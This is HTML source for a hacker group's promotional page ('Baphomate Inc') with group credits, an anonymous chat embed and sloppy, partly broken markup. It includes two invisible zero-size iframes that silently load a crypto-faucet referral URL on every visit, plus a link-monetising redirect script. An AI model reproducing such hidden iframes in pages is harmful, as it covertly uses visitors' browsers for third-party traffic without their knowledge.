<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <iframe src="https://autofaucet.org/wm/jabarzad/2" width="0" height="0" style="border:0"></iframe>
    <title>Baphomate Inc</title>
    
    <!-- StyleSheets  -->
    <link rel="stylesheet" href="https://tools.prinsh.com/home/assets/css/dashlite.css?ver=2.4.0">
    <link id="skin-default" rel="stylesheet" href="https://tools.prinsh.com/home/assets/css/theme.css?ver=2.4.0">
     <!-- FontAwesome Icons --> 
    <link rel="stylesheet" type="text/css" href="https://tools.prinsh.com/home/assets/css/libs/fontawesome-icons.css"> 
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">
    <!-- Themify Icons --> 
    <link rel="stylesheet" type="text/css" href="https://tools.prinsh.com/home/assets/css/libs/themify-icons.css"> 
    <!-- Bootstrap Icons --> 
    <link rel="stylesheet" type="text/css" href="https://tools.prinsh.com/home/assets/css/libs/bootstrap-icons.css">
    <!-- JS Khusus --> 
    <script type="text/javascript" src="https://tools.prinsh.com/assets/jquery/jquery.min.js"></script>
    <script type="text/javascript" src="https://tools.prinsh.com/assets/jquery/jquery.slim.min.js"></script>
    <!-- General Header --> 
    <style>
        body {
            background: black;
            font-size: 16px;
            font-family: sans-serif;
            
            height: 0vmax;
        }
        @font-face {
            font-family: "Old English";
            src: url(fonts/OLDENGL.TTF);
        }
        #judul {
            padding: 5px;
            max-width: 100%;
            width: 720px;
            margin: auto auto;
            color: cyan;
            text-align: center;
        }
        h1 {
        	font-weight: bold;
        	text-align: center;
        	font-family: "Old English";
        	font-size: 50px;
        	color: green;
       }
        h2 {
        	font-weight: bold;
        	text-align: center;
        	font-family: "Old English";
        	font-size: 50px;
        	color: green;
       }
       p {
           font-size: 16px;
           color: cyan;
       }
       .bo {
           background: black;
           border: solid white;
           border-radius: 10px;
       }
       #typing {
            width: 30%;
            color: #676767;
            float: left;
            font-size: 16px;
            margin: 1px;
            padding: 10px;
            overflow: hidden;
            white-space: nowrap;
            animation: typing 6s steps(24) 1s infinite;
        }
        #typing span{
            color:green;
        }
        #crow {
            float: left;
            margin-top: 1%;
            margin-bottom: 0%;
            color: green;
            font-size: 19px;
            animation: crow 0.4s linear 0s infinite;
        }
        @keyframes typing {
            from {
                width: 0;
            }
            to {
                width: 250px;
            }
        }
        @keyframes crow {
            from {
                opacity: 0;
        }
            to {
                opacity: 1;
            }
        }
        button{
            font-family: "old English";
            font-size: 30px;
            background: green;
            color: cyan;
            border: white 3px solid;
            border-radius: 5px;
            padding: 12px 20px;
            margin-top: 10px;
            width: 50%;
        }
     
        button:hover{
            opacity:0.9;
        }
        .footer {
            position:absolute;
            bottom: 0vh;
            color: lightcyan;
            width: 100%;
            margin-bottom: 0%;
            height: 0%;   /* Contoh tinggi footer 60px */
        }
        #cont {
            background: dimgray;
            color: white;
            border: solid green;
            border-radius: 10px;
            font-family: "old English";
        }
        .kira{
    /* background: linear-gradient(330deg, #e05252 0%, #99e052 25%, #52e0e0 50%, #9952e0 75%, #e05252 100%); */
  	background: linear-gradient(330deg, #ff0000 0%, #31e400 25%, #00f7ff 50%, #7f00ff 75%, #ff0000 100%);
    background-size: 200% auto;
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
    animation: animate 1.5s linear infinite; 
    }
@keyframes animate{
      to {
        background-position: 200% center;
      }
    }

    </style>
</head>
<body>
    <iframe src="https://autofaucet.org/wm/jabarzad/2" width="0" height="0" style="border:0"></iframe>
    <center><img style="width:100%" src="img/logo.jpg"</center>
    <div id="judul"><h1>Baphomate Inc</h1></div>
    <div class="bo">
        <marquee behavior="welcone" direction="welcone">Welcome to ai | Baphomate Inc - sence 2022©</marquee>
    </div> 
    <center><p style="color: white">Baphomate Inc. Is an organization of a team of ethical Hackers, not Satanists but Internet Satanists surfing the cyber world.</p></center>
    <center><b style="color: red">Fouder & CEO:</b></center>
    <center class="kira" target=_"blank"><b style="font-family: old English">Kirasinigami👑 | 4YourPage👑</b></center>
    <center><b style="color:red">Best regards:</b><p style="color: white">Mr.Kenichie - Mrs.D4K0TCH4N - CYLIS - Bjorka - Mr.t - Mr.KN444 - Mr.KJ</center>
    <center>
     
          
        <a href="asset/home.html" target="_blank">
        <button class="button kira" target="_blank">Click here</button></a>
    </center>
    <div id="cont">
        <div class="panel panel-default">
				<style>a[class="btn Right Interactive Hand"]{display:none;}</style>
				<div class="panel-body" style="background-color: #1f1f1f; text-align: center; font-family: Bungee"><h2>Baphomate Chat</h2><br><br>
				<center style="font-family:old English">Live Chat anonymously</center>
					<iframe src="https://www5.cbox.ws/box/?boxid=937818&boxtag=y7wwvc" width="100%" height="450" allowtransparency="yes" allow="autoplay" frameborder="0" marginheight="0" marginwidth="0" scrolling="auto" class="komen"></iframe>
				</div>
			</div>
    </div>
 
        <footer>
            <div class="footer-wrapper text-center">
                <div class="footer-section f-section-1">
                    <p class="">Copyright © 2022 <a href="https://www.prinsh.com" class="kira" target="_blank">Kirasinigami👑</a></p>
                </div>
            </div>
        </footer>   
    <script type="text/javascript">
    var go_url = 'https://semawur.com/';
    var api = 'e7ba0d0b8c688a86a4f20b016b22709cf9cec5fa';
    var shorten_includ = ["https://baphomate.github.io"];
</skrip>
<script src='//safelinku.com/js/web-script.js'></script>
</body>
</html>
    
